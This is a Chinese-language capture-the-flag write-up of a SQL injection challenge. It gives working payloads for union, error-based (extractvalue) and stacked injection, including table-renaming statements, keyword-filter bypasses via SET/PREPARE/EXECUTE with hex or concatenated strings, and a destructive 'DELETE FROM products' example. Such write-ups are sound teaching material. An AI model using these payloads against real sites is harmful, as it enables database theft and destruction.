一 首先判断注入点的存在以及类型。
1 正常 1' 报错,并根据报错信息以及1'#回显正常判断出符号包裹为单引号 1' and 1=1# 返回信息 1' and 1=2#无返回信息 因此存在单引号注入点
输入1' or 1=1 #可得到这个表的所有内容
二 获取列数
1' order by 1# 1' order by 2# 1' order by 3# 报错
列数为2
三 尝试获取数据库名 表名 版本等基本信息
-1' union select database()#
返回
return preg_match("/select|update|delete|drop|insert|where|./i",$inject);
多个关键词都被过滤 /i 表示大小写都会被匹配到。
大小写无法绕过过滤,尝试注释绕过和双写绕过。
-1' union sele/**/ct database()#
也无法返回正常结果。
尝试报错注入
1' and extractvalue(1,concat(0x7e,user(),0x7e)) # 1' and extractvalue(1,concat(0x7e,database(),0x7e)) # 1' and extractvalue(1,concat(0x7e,version(),0x7e)) #
报出期望信息,但是没有select 无法查询更详细的字段信息。
四 方法1堆叠注入
在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,
两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。
用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select * from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。 堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,
利用mysqli_multi_query()函数就支持多条sql语句同时执行,
但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,
其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。 打开此题,进行常规测试,如1' or 1=1# ,1' order by 1# 在1' order by 3时报错,说明列数为2
-1' union sele/**/ct database()# # 注释符也无法绕过 1;show databases; # #列出数据库 1';show tables;# #列出表 1';show columns from words;# #查看words的列 1';show columns from `1919810931114514`;# #查看1919810931114514表的列或者desc `1919810931114514`查看表的结构
表名为数字时,要用反引号包裹起来查询。
1' or 1=1# 查看当前默认表的所有段,结合查询的words表的字段可知道words是默认查询的表。
并且可推测当前页面查询语句是slect id,data from words;
有这样的思路:如果把要查询的表名改为默认表名,同样也要把查询的字段改为默认查询字段
修改表名(将表名user改为users) alter table user rename to users; 修改列名(将字段名username改为name) alter table users change uesrname name varchar(30);
1';alter table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100);#
1' or 1=1 # 得到flag
五 方法二 预编译
set用于设置变量名和值
prepare用于预备一个语句,并赋予名称,以后可以引用该语句
execute执行语句
deallocate prepare用来释放掉预处理的语句
先将select * from 1919810931114514进行16进制编码,set prepare被检测到,strstr函数不区分大小写,
strstr($inject, "set") && strstr($inject, "prepare")
大小写绕过过滤,构造payload
1’;SeT@sql=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;Prepare stmt from @sql;execute stmt;#
1';SeT@sql = concat('se','lect * from `1919810931114514`;');Prepare stmt from @sql;execute stmt;#
1';SET @sql=concat(char(115,101,108,101,99,116)," * from `1919810931114514`");Prepare stmt from @sql;execute stmt;#
以上三种都可以